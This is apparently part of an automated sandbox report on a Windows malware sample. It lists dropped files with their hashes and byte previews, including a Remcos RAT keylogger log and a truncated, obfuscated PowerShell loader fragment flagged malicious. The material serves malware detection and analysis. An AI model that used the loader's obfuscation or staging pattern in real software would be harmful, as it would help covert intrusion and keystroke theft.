Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.6.8.1.6.3.3.5.8.0.5.2.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.6.8.1.6.3.4.0.9.6.0.3.3.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.2.6.9.6.6.8.f.-.8.d.0.f.-.4.b.4.3.-.9.0.5.3.-.8.7.4.2.9.b.e.6.c.6.0.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.2.c.9.5.e.9.-.8.2.c.2.-.4.e.9.b.-.8.7.d.1.-.8.1.2.f.4.b.7.6.7.d.5.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.m.s.i.e.x.e.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.4.f.0.-.0.0.0.1.-.0.0.4.d.-.7.2.a.e.-.4.a.a.d.d.4.1.7.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.d.0.c.7.c.f.c.a.8.1.0.4.d.0.6.d.e.1.f.0.8.b.9.7.f.2.8.b.3.5.2.0.c.2.4.6.c.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A76.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:46 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	161124
Entropy (8bit):	1.8387921709806796
Encrypted:	false
SSDEEP:	768:1zxue5EnbBcq6n0QOjD+NOk+/JRdMFGtzHyp92E:aBcH4k0JRdMFGtzHyp92E
MD5:	F9583B5859245B290C5282029473254C
SHA1:	FBC052D0AA31511EF54B581EBB64794D057D9D2E
SHA-256:	788256DC81A0D1114EEBEF1F278A5FD0849BBD28BA79D7925E385F50338CD8D4
SHA-512:	6C1BE077D16FF98931D10BEB3AE7431F8ACA2A4A2B1346C9F938E554B759FE00CE1A618CD5686BAE60518C695424FC80642060821AE7F5D628527C0A0B00EFD1
Malicious:	false
Preview:	MDMP..a..... ........\.g.........................#..........4....i..........T.......8...........T............Y...............-.........../..............................................................................bJ......p0......GenuineIntel...........T............\.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B13.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.694297801663072
Encrypted:	false
SSDEEP:	192:R9l7lZNiUg62x6YqA6whugmfd84rpDa89bhHp8ssfnLm:R9lnNib646YF6whugmfdRNhHp8/fi
MD5:	54F2B9C9EE9908EF57183B5C56EF690F
SHA1:	8E14C194D4CC74D10E71237F7DE3C0F55269CB01
SHA-256:	B1C96D036CAF8EB980E082D67D05D97A86ED298B514605FDBC37C462227CCCB8
SHA-512:	6B10A0699B795D972F4818B9D645B54886EF846B3EA0132D9AB0018098DE78562FC4C21A96BFAD3DD05877B9CB7F55D16A7F37D119672754CE548EFEF7CE9270
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6B33.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4790
Entropy (8bit):	4.475263691878414
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsHe702I7VFJ5WS2CfjkKs3rm8M4J5sgFMA+q8AFiEFBd:uILf+7GySPfUJYAOEFBd
MD5:	5B686901E1EDD7C024F9ED8C6C4E9247
SHA1:	70C5AFB1CCE6B076728B26C6267F32CB1232EC26
SHA-256:	AE56E3C282CE1577AC4BF663C5114DDA694168B2A19E8F43DFF1724FB3E02CDC
SHA-512:	E95320B743C0DAE2AFCC608F539AE7EB6D7A99BB41855AFA37190BAD420095866113548D2663F8034793D75C9808BFF1FFFB530A634E0444AB6B5F4E0AD6127F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222875219" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREB82.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Oct 6 09:47:13 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	171596
Entropy (8bit):	1.8427787355926217
Encrypted:	false
SSDEEP:	384:X1PykXlkAx5HEncDtxNZ8EWW19q6EcdHLV6KwhURMfVukSI39cwCH5Mou:lBm25EncDtRWW19q6EmpcWafVpNcco
MD5:	6E958D1F7B3EC13C0A17871D42615CAE
SHA1:	B2C927F33CBE13F7400C70C7E76283AB40389FAE
SHA-256:	DAB463DFC5B0E5C0D9D81A41A58394771C118BAEA3C1C40FF610B9BBE0AC664F
SHA-512:	F7B58FCD2D00131F14AB147C1A11192FCBE89810620D38FFF57CD015B3AE0784BCD544DB221EA03D7DD8097C788FBE44FE43F464562629201353F9C839CFF372
Malicious:	false
Preview:	MDMP..a..... ........\.g............4............#..<............l..........T.......8...........T............Z...C.......................0..............................................................................bJ.......0......GenuineIntel...........T............\.g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WEREC8C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.691612959534491
Encrypted:	false
SSDEEP:	192:R9l7lZNiUsA6K6YqE6WIgmfxUND4rpr+89bZHp8ssfQzm:R9lnNiI6K6YB6WIgmfxUNERZHp8/f5
MD5:	C97F29F1ACA94D773B5DAA02D35D2495
SHA1:	ACC241BA2330C459F5099963887A6900907F9FA4
SHA-256:	8CE63F6A2BBA85A09E458B4E14FC473F5ADB1BAA47DFF9F8467E7BBD70AA9E54
SHA-512:	2C8371E4DC28F05A1DA8944A07CE2700018DEDBA64C3B9E46B48E1A7EE62A7DE4E1A9372C95CC724C5E51F97656DDB563876E0BDD156795A8D3977B0D258C5E4
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.2.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERECCC.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4790
Entropy (8bit):	4.4760910562810805
Encrypted:	false
SSDEEP:	48:cvIwwtl8zsae702I7VFJ5WS2CfjkSPms3rm8M4J5ssFfo+q8AZiEFBd:uILf/7GySPfJP5JXoqEFBd
MD5:	4C2F6824FFE5FF9154BFB840F4FFEAFF
SHA1:	C60042F6849B8D2D921D1B859745B99559CAC0E0
SHA-256:	8EE4F9C8FDE8796C4B16AFACFBB672C89B795B79A5416FC14B0195F6733FB402
SHA-512:	9920DF95BCD891D372827DB6B1CB0BEDCC0B278FE50C1A17D9AB85F007AF0DE67A686C948D40611DB7F03D94A573CAE1A42F646E02F6220D6241A7E1A38AF3B5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222875218" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	242
Entropy (8bit):	3.3605062470053775
Encrypted:	false
SSDEEP:	6:6lJ8DS0Cb5YcIeeDAlMlJ8DS0NwR1SlJ8DS8FIbWAv:6lJ8yDecmlJ8ZlJ8PIbW+
MD5:	D720B019BE1F03C97E325758BE4EAF08
SHA1:	48083EE3F2769F3C87EB2CDC4D6EEA58410EB50A
SHA-256:	FC04BF73CBA8E072D6DB3C49C194A73B4D27334A28E375944B144B6D5CD31F30
SHA-512:	B9408A84D190F9031E58CF29D1AA628F0D2EBF6A16A61FBA6D8587B882752DADC7DC775F49ACE4FF5004DBE18B31E35151A525AF0CE4A4EA9D4B07220BCA1A98
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Preview:	....[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.0.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.0.9. .R.u.n.].........[.2.0.2.4./.1.0./.0.6. .0.5.:.4.7.:.1.0. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	14744
Entropy (8bit):	4.990428309401091
Encrypted:	false
SSDEEP:	384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdB4NXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdB4NZiA
MD5:	A3F4A4CED5E4717EA59EEDAAA642F0CF
SHA1:	EB40B4929869C8C2A8866A0F06AE166F406FE493
SHA-256:	59B8E05483EA0D66C8F98CB27508791C4066743462559CE29BBF658DD88BEC0E
SHA-512:	804565218357E45BBFEE9661AF75E9941B54E1B6AA656DE02E57A0842BCA8E679F2250E004B4FF7705F4A22C65F9A3A48AF9614A851D8C062DF4DA3B99A67257
Malicious:	false
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sffczvd.ngz.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_edvwaufn.oq1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hshqsjft.zq2.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcnbu3an.5pv.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Ensuable47.haa

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	78853
Entropy (8bit):	1.2455837622809836
Encrypted:	false
SSDEEP:	384:3xbi0gBtJQNRoJSzCkwEtgPy35L11XkHfhbW+gi9XXtdj+3IPEk3RewnMpvVGukp:3xbirBtJQN6JR+3t11XkZKU9XPELtkp
MD5:	824141132C7447FD5FEFE32B734E91EE
SHA1:	84631EE3FEE81D126E8129AB3E837DB105912176
SHA-256:	8C86022F0ED34AA823A873EEA842DB85411C0A5FFC75E9A0B3F9F045471FA838
SHA-512:	EE4BAEEC6921AB62DA9BAFD5C75276117736F8741F74936E4CEE9CFA18F47BE0D6777B3D3F9269A2E3383AAFF858B4513B69A1007E5E11B1AEB8FCEFE651440D
Malicious:	false
Preview:	...........C......}......................................................................................................d..............b...........q..........,........W.......................P............................................................................d.............................................................=.....,.........................U..................................................`...................N....................................y.............................j.......................................j................................7..........]............................................................\...........................A........................................................................J........................................-............................................Av..............l............w.\....................)............9.......H......t....................................................~...............................

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Falkespors.Var

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	ASCII text, with very long lines (3209), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	54283
Entropy (8bit):	5.361679605378956
Encrypted:	false
SSDEEP:	1536:oh9f0RLFjL+EcdjZ1vLuUX6o+tGsxj4wiInD8DeFW:ohIdC5ki6HqELW
MD5:	B8754D46031D79E381032DC495738F37
SHA1:	C1DFA31255DC6D514D03A4A78DFEFC38AC79F291
SHA-256:	0AA4DFFDFDF131923B9559FADBF0CBC382C60AF309C4E075151FD73828BA631B
SHA-512:	C7C30FD11D98B97371B0848134FF3A44758F8E3AB3E33BDA6DA18D0988A3DE56A30E80720B4C37E7878EDB672B43B7BDB2C3E0464ECA48F23A9C7F3493C8F396
Malicious:	true
Preview:	$Kulissen=$Maskinhandleren136;..<#untameness Defineringen Contourne Knytte Calypters #>..<#Giglet Bydelens Maximalist #>..<#Kontraktforholdet Seerband Arkivfilmens Formidlinger Agreers Geobotaniker #>..<#Tectorial Telefonbeskeder Glosens Tortur Miljfremmedes Plastiks #>..<#Ungenius Licenceless Enigt #>..<#Rouletterne Doty Tubule Logometrical Epoxyharpiksernes Organizabilities Anklangens #>...$Paany = @'. Sylv..tomi$ForetV Kul e,picigUndereB uget hyse Pascr Subje Eli.d S reeF strsZo.ma3Depe,4Krymm=Ka.hi$DisguFForhajCabale r,jenAmtetdCharas Ebu,kTr ubaPrecibConjuedehumtJu.tasO nern.utbenKart u C.pslXeroplContewElectl PupirDammu;flyve.PletsfIndrmuJ.dicnMicr.cDeutet Treti blegoSndern Dich AlumiPMi prr .onoeProprc Reimo iksmSkifemfusiou actn Emoti gargcDyhrraRabartSkyldiIlluso ilamnSacch dukk( erre$ Y koF Duc jBlom,eSy.ptnTutordFllessAfflukbe laaNlderbYlva e BlactTalkasIrres,Win o$MormoC W.rpo InquhBeskfi,ndemb .onpiUn.ertBomlriDeposvTorsoeBkken)Bog,i egal{ unsy.Sto,m.sylds$ FlagDfribb

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Kastepils.paa

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	384624
Entropy (8bit):	1.248833521425474
Encrypted:	false
SSDEEP:	1536:W6cz0sUWiVbCEoc9wgvpThh7bVWBYRM1XQpOD:cIzpxHvphhVWBCw8OD
MD5:	9B6ACDA0C5F46046E385C0790128D0C2
SHA1:	6BD58E2F72155950922FFC3C834569C4170A19CB
SHA-256:	0A8A0437AE28DB331634876CE10D4CD83282F8F157C88D4AC91BBFC7102AC727
SHA-512:	028F16C856B926C9BAC6569F6EED0EE943CC9522B6301930DDC571E2314F11955D79FEA2B64DE3A332BC99A165A9FD81A97E2F216F3B5F5DBF19719159D2B142
Malicious:	false
Preview:	......................................................................................................Y........................................7...............................x................................................J)..................................................................................................I................................................................C..........."..............0...........................C........................................................................................."......................................^..........................9.........D........................................f.............w................................./.....................>.................................#..................................................A.............I.............p............................................m..................k........................................................)..........................................

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Klitoriser51.adm

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	129475
Entropy (8bit):	1.2572241713566128
Encrypted:	false
SSDEEP:	768:8NDyIGIJQJn7z1buGQfGc5yItzeF6/57P6lkcjp1lhlOh/6fCT3:HJ7u9aVf0Jx3
MD5:	438EC0B53BC58AFA50B6C67950DF66D3
SHA1:	39BC09893AE86854F4A9204D5E75CF02A8B7E8FF
SHA-256:	E89BFD83D25FD03FDBA5D94B3D2E7F3A06F3EEA6D538FD397EBAFF4252EAE941
SHA-512:	195A2BDAA2F6D1B8C1E4B7ED5856D26818B8B142688EE33CB245084938F56D7E08930194D7CD15BCDE0BB8956CF0A15C34E05ADA06C25EEA98D6FC9250CB966B
Malicious:	false
Preview:	..................-...............................................................................................................................................N..................(....................................................I.....................................}'........-........................................................%.....................................................U.............-..."........................P................................#......f....9.............................5..M........e.......................s.................................................................................c...................................I.................W.................................G.B...............c......................U...................\..................................................................................................................................&......[..................O.....................i...............................@.........

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\Loquaciousness.Acc

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	313594
Entropy (8bit):	7.718949917493243
Encrypted:	false
SSDEEP:	6144:dVhXa+OFcyNokRx6hV+eIskuCQvw8c1SE1lZkhyE3AAcYtK7CNxXf0f8DEWktAb0:RDkRxShL/usE1nyy+WCN2f9htAFHlRm
MD5:	B94F573B2BD801105D4A2F06933D5770
SHA1:	FEEA08423EE946072A97F702B633623C605CA03D
SHA-256:	2CDB0341A8A218F53C689CB81512C87B11E71E56D2E4709EDBBCEB2A81B5D5C4
SHA-512:	C90549B027A0105D8376232C71E7897B6581079254B026748EC640D38CA165BEE1DB6FDD35702489A0555FC864A4887ADBD2B4C7A057B07D9913FF10CBC1296C
Malicious:	false
Preview:	......ccc...b.b..................................^^........d...........ddd.##.................................e....IIII...#.....C.....g..................9999.333.........444.....U.-.'...4......{.<<<<<....2.::.!...........v.....__..!!...........A............HH............./............w...........}}...................S...........>>>>>.a................&&.....N....6............s..8.......yy...(................g...........00..........,.....l.}}...........................tttttt............KK...(.....3.f.........0.^^........................................v.......(....^..u.............q...l...........\|\|.....$$$.......................#.?.....................$.....................O..................1.....).................\|\|\|..$$............VVVV........0........+........`.........sss.`..................].I.............................?.................]]...............................k..........b..........""".....]]]......G................&&.............``.........f..33..BB.....C.............

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\gangsterfilmen.sky

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	209545
Entropy (8bit):	1.2697940266141337
Encrypted:	false
SSDEEP:	768:GB9fz0i3eSF6qok2kiuGuccV7/BZWgd1LadtY5w7PJsQpEINlaiBVtM6F8+AXF6N:14sJhOhiKT6vV
MD5:	AD805DD3CCD4E51E794B31FECB308E37
SHA1:	60A468E13054100E7171AC9EBCFC6ACC11ECEFE4
SHA-256:	C23B6450A4D80F70F25449D74B945A1B889CAEDE1881359A1A4934AC2C947D0F
SHA-512:	ECCCA66ED902438B2EC4B9AD16C0A0EBC6DD1287817714CD7B1C4222B2FE17746D167327AB445CEA38D6C15ECA66ADDE913698AFAD999C7D17CA67B037F7BC7F
Malicious:	false
Preview:	.........................].................O..E............................s......................x...<......................................S...........................\....................................................p..............).........................................................................................}.......................................................6.................................................<............................;.......................................................... ........................................(.........P............................<........................................j..............7.................................y..q...............................,<......................+......................(........._...............S....j................................@......................................2................n.........4.........................f........................................................C.............

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\stoejdelen.aud

Download File

Process:	C:\Users\user\Desktop\zR4aIjCuRs.exe
File Type:	data
Category:	dropped
Size (bytes):	163471
Entropy (8bit):	1.2547111118094014
Encrypted:	false
SSDEEP:	768:Xyj8YpMGWHC57RDcZ3RcixTn9scZB+eTEHlhv9T6j+XbGkO/1eu5qV5D0jB43:Xr+eZwITkqq29
MD5:	76003043201C6410C1D4B56A1357B6DF
SHA1:	43BD7B9D6BFD3354C40358847994BA8B241F7252
SHA-256:	387143B793C16EF84FF29AEF4D62E252ADCC59EADC3912800BF1118013392BFA
SHA-512:	C180C254C16B7FF4D27D1823F49D8830A8E6FC24FC49366605433521FF10A7DB5A056A12C9576738973E8089813616FE899AE88F46CE10C4AB54E9C2DCDA5374
Malicious:	false
Preview:	.......H..........................................#y...................................s....................".p...................................0...........3........................................1.................R...................................2......................................................4.................4.......................................................................................................}..Q....................................................................g.J.......................................d.......]........................R...............b.................................................................R.....c...............;..................................n...........................G...............5..........6...?.......................&.......................................^..............................................................................................~...............4.........................+............[.....)@...

C:\Users\user\AppData\Roaming\determinationens\Wanderlustful\svageliges\zR4aIjCuRs.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	776478
Entropy (8bit):	7.022322453988849
Encrypted:	false
